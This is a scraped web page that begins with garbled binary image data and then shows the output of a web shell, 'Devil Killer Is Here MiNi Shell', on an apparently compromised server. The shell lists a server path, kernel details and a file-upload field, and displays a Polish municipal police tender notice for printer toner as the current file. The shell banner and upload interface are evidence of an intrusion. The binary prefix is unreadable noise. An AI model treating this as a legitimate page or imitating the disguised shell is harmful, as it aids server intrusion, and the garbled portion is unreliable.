JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20200217/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20200217/509745-N-2020.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 509745-N-2020 z dnia 2020-02-17 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Straż Miejska Miasta Stołecznego Warszawy</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Dostawa materiałów eksploatacyjnych do urządzeń wielofunkcyjnych, drukarek oraz kserokopiarek</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Dostawy</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej – mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Straż Miejska Miasta Stołecznego Warszawy</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">15271428000000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Młynarska</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">43/45</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">01-170</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Warszawa</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">mazowieckie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">22 8511612</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">miroslawa.plominska@strazmiejska.waw.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">22 6656044</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">http://www.strazmiejska.waw.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">http://www.strazmiejska.waw.pl</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja"></span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Składanie wniosków odbywa się za pośrednictwem operatora pocztowego w rozumieniu ustawy z dnia 23 listopada 2012 r. - Prawo Pocztowe (Dz. U. z 2018 r. poz.2188), osobiście lub za pośrednictwem posłańca. Wniosek musi być złożony w formie papierowej.</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Straż Miejska m. st. Warszawy, ul. Młynarska 43/45, 01-170 Warszawa, osobiście lub za pośrednictwem posłańca na adres Wydział Zamówień Publicznych Straży Miejskiej m. st. Warszawy przy ul. Sołtyka 8/10, 01-163 Warszawa, budynek A, wejście c</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Dostawa materiałów eksploatacyjnych do urządzeń wielofunkcyjnych, drukarek oraz kserokopiarek</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">SM-WZP-2131-2/20</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Dostawy</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski"></span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Przedmiotem zamówienia jest sukcesywna dostawa materiałów eksploatacyjnych do urządzeń wielofunkcyjnych, drukarek oraz kserokopiarek. Asortyment oraz maksymalna ilość materiałów eksploatacyjnych określone są w formularzu wniosku o dopuszczenie do udziału w postępowaniu. Materiały eksploatacyjne muszą być zgodne z opisem poszczególnych pozycji w wykazie przedmiotu zamówienia. W zakres przedmiotu zamówienia wchodzą: toner do HP Laser Jet P2015 Series/ M2727nf MFP w ilości 30 szt. o minimalnej wydajności kasety 7 000 stron A4 przy 5% pokryciu, toner do HP Laser Jet P 2055DN w ilości 70 szt. o minimalnej wydajności kaset 6 500 stron A4 przy 5% pokryciu, toner do HP Laser Jet P 4015 DN w ilości 10 szt. o minimalnej wydajności kasety 24 000 stron A4 przy 5% pokryciu, toner czarny do HP Color Laser Jet CP 3505 w ilości 24 szt. o minimalnej wydajności kasety 6 000 stron A4 przy 5% pokryciu, toner do Brother DCP 7055 w ilości 10 szt. o minimalnej wydajności kasety 2 600 stron A4 przy 5% pokryciu, toner do Lexmark MX 717DE w ilości 30 szt. o minimalnej wydajności kasety 25 000 stron A4 przy 5% pokryciu, bęben do Lexmark MX 717DE w ilości 13 szt. o minimalnej wydajności kasety 100 000 stron A4, toner do Lexmark MS 810DN w ilości szt. 20 o minimalnej wydajności kasety 25 000 stron A4 przy 5% pokryciu, bęben do Lexmark MS 810DN w ilości 10 szt. o minimalnej wydajności kasety 100 000 stron A4, toner do Lexmark MX 510DN w ilości 20 szt. o minimalnej wydajności kasety 20 000 stron A4 przy 5% pokryciu, bęben do Lexmark MX 510DN w ilości 10 szt. o minimalnej wydajności kasety 60 000 stron A4, toner do OKI B721 DN w ilości 6 szt. o minimalnej wydajności kasety 18 000 stron A4 przy 5% pokryciu, toner do OKI MB 472 DNW w ilości szt. 100 o minimalnej wydajności kasety 7 000 stron A4 przy 5% pokryciu, bęben do OKI MB 472 DNW w ilości 45 szt. o minimalnej wydajności kasety 25 000 stron A4, toner do Samsung SCX-4833 FR w ilości 270 szt. o minimalnej wydajności kasety 5 000 stron A4 przy 5% pokryciu, toner do Samsung SL-M 3370 FD w ilości 30 szt. o minimalnej wydajności 5 000 stron A4 przy 5% pokryciu, toner do HP Laser Jet PRO M521 DW w ilości 15 szt. o wydajności kasety 12 500 stron A4 przy 5% pokryciu, toner do Xerox B1025V_U A3 w ilości 6 szt. o minimalnej wydajności kasety 13 700 stron A4 przy 5% pokryciu, bęben do Xerox B1025V_U A3 w ilości 1 szt. o minimalnej wydajności kasety 80 000 stron A4, kardridż czarny (K) do Canon PIXMA IP 110 w ilości 5 szt. o minimalnej wydajności kasety 190 stron A4 przy 5% pokryciu, kardridż kolor (CMY) do Canon PIXMA IP 110 w ilości szt. 5 o minimalnej wydajności kasety 250 stron A4 przy 5% pokryciu, toner do Konica Minolta Bizub PRO 951 w ilości 4 szt. o minimalnej wydajności kasety 137 000 stron A4 przy 5% pokryciu, pojemnik na zużyty toner do Konica Minolta Bizub PRO 951 w ilości 4 szt., zszywki do Konica Minolta Bizub PRO 951 (3x500 szt./1 op.) w ilości 2 op. Wykonawca zobowiązuje się dostarczyć materiały eksploatacyjne „wysokowydajne", tzn.: materiały o maksymalnej, dostępnej na rynku pojemności zasobnika dla danego urządzenia. Dostarczone materiały eksploatacyjne (wraz ze wszystkimi elementami wchodzącymi w ich skład) muszą być fabrycznie nowe, bez śladów używania i uszkodzenia, pełnowartościowe, nieregenerowane, opakowane hermetycznie. Dostarczone materiały eksploatacyjne muszą być materiałami odpowiadającymi parametrom techniczno-eksploatacyjnym wskazanych urządzeń, zgodnie z wymogami producenta tych urządzeń. Dostarczone materiały eksploatacyjne muszą posiadać gwarancję producenta, do momentu wyczerpania środka barwiącego w przypadku materiałów eksploatacyjnych, których to dotyczy. Materiały eksploatacyjne, w których zostały użyte znaki towarowe, można zastąpić produktami o parametrach równoważnych. Oferowane produkty równoważne muszą posiadać wydajność nie gorszą niż materiały wskazane przez Zamawiającego. Oferowane równoważne materiały eksploatacyjne nie mogą powodować ograniczeń funkcjii możliwości urządzenia oraz zaniżać jakości wydruku w stosunku do materiałów oryginalnych. W przypadku, kiedy produkt oryginalny posiada wbudowany układ scalony, produkt równoważny powinien posiadać analogiczny element, działający w ten sam sposób. W przypadku uszkodzenia urządzenia, spowodowanego wadliwością dostarczonych materiałów eksploatacyjnych, Wykonawca jest zobowiązany do zwrotu kosztów rzeczywistej naprawy urządzenia oraz kosztów ekspertyzy, wykonanej przez autoryzowany serwis naprawczy.Materiały eksploatacyjne równoważne są produktami:1) fabrycznie nowymi,2) nieregenerowanymi, 3) wytworzonymi seryjnie w cyklu produkcyjnym, zgodnym z normą ISO 9001 lub normami równoważnymi, 4) opakowanymi hermetycznie, 5) nienoszącymi śladów użytkowania, 6) które zapewnią jakość wydruku co najmniej taką, jak materiał zalecany przez producenta urządzenia,7) które nie będą ograniczać pełnej współpracy z oprogramowaniem urządzenia, monitorującym stan zasobników z tuszem lub tonerem,8) które w żadnym stopniu nie będą naruszać praw patentowych ani innej własności intelektualnej,9) posiadające aktualną gwarancję producenta, nie krótszą niż 2 lata od daty dostawy,10) które nie będą materiałami eksploatacyjnymi napełnianymi powtórnie lub skopiowanymi, w sposób naruszający prawo polskie lub UE,11) dopuszczonymi do eksploatacji przez producenta tego urządzenia.Wszystkie oferowane materiały eksploatacyjne muszą być opatrzone znakiem firmowym producenta, etykietą zawierającą numer katalogowy, kodem kreskowym, listą modeli urządzeń, do których jest przeznaczony oraz terminem ważności. Każdy musi posiadać swój indywidualny i unikalny numer seryjny, w przypadku tonerów zaszyty w ich elektronice, oraz datę przydatności do użycia, która nie może być krótsza niż 2 lata od daty dostawy, potwierdzonej protokołem zdawczo-odbiorczym podpisanym przez Strony. Pod pojęciem „fabrycznie nowe” Zamawiający rozumie materiały eksploatacyjne wykonane z nowych elementów, wytworzone jako nowy, nieregenerowany, nieuzupełniany produkt, z fabrycznymi zabezpieczeniami, bez śladów uszkodzenia, w oryginalnych opakowaniach producenta, z widocznym logo/nazwą producenta, nazwą (typ/symbol) produktu, posiadające wszelkie zabezpieczenia szczelności zbiorników z tonerem. Przy ich produkcji wykorzystane było 100% nowych części (żadna z części np. kaseta, bęben światłoczuły, obudowa, listwa podająca, listwa zbierająca, wałek magnetyczny, głowica drukująca, toner, atrament, tusz, śrubki, sprężynki oraz pozostałe części, nie były wykorzystywane w formie pierwotnej w całości lub w części w innym produkcie). Materiały eksploatacyjne nie mogą mieć śladów używania i uszkodzenia, nie mogą być regenerowane, prefabrykowane.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">30125120-8</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc">67108,12</span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc">PLN</span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów – szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2020-12-31</span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow">Zasady przygotowania wniosku o dopuszczenie do udziału w licytacji elektronicznej: 1) Treść wniosku o dopuszczenie do udziału w licytacji elektronicznej wraz z pozostałymi załącznikami, można pobrać ze strony internetowej Zamawiającego: http://www.strazmiejska.waw.pl. 2) Wykonawca może złożyć tylko jeden wniosek. Wniosek oraz wszelkie wymagane dokumenty muszą spełniać następujące wymogi: 1) Wniosek musi być sporządzony czytelnie, w języku polskim, z zachowaniem formy papierowej, 2) Wniosek i oświadczenia muszą być podpisane. Za podpisanie uznaje się własnoręczny, czytelny podpis lub podpis z pieczątką imienną, złożony przez osobę(-y) upoważnioną(-e) do reprezentowania zgodnie z formą reprezentacji Wykonawcy określoną w dokumencie rejestrowym lub innym dokumencie, właściwym dla formy organizacyjnej, 3) Do wniosku należy załączyć dokumenty wymagane postanowieniami ogłoszenia o zamówieniu 4) Dokumenty sporządzone w języku obcym, muszą być składane wraz z ich tłumaczeniem na język polski. 5) Dokumenty mogą być składane w formie oryginału lub kopii poświadczonej na każdej zadrukowanej stronie "za zgodność z oryginałem" przez uprawnionego przedstawiciela Wykonawcy. 6) W przypadku, gdy Wykonawcę reprezentuje pełnomocnik, do wniosku musi być załączone pełnomocnictwo określające jego zakres i podpisane przez osoby uprawnione do reprezentacji. Pełnomocnictwo musi być złożone w oryginale lub jako potwierdzona notarialnie kopia. Wykonawcy ponoszą wszelkie koszty związane z przygotowaniem i złożeniem wniosku oraz udziałem w postępowaniu, w tym w licytacji elektronicznej. Opakowanie wniosku powinno być oznakowane jako "WNIOSEK" oraz opatrzone nazwą przedmiotu zamówienia oraz pieczęcią firmową Wykonawcy (lub opisem w przypadku jej braku) zawierającą co najmniej jego nazwę i adres. Opakowanie należy zaadresować i opisać według wzoru: Zamawiający: Straż Miejska m. st. Warszawy Wniosek o dopuszczenie do udziału w licytacji na „Dostawę materiałów eksploatacyjnych do urządzeń wielofunkcyjnych, drukarek oraz kserokopiarek” - SM-WZP-2131-2/20.</span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) 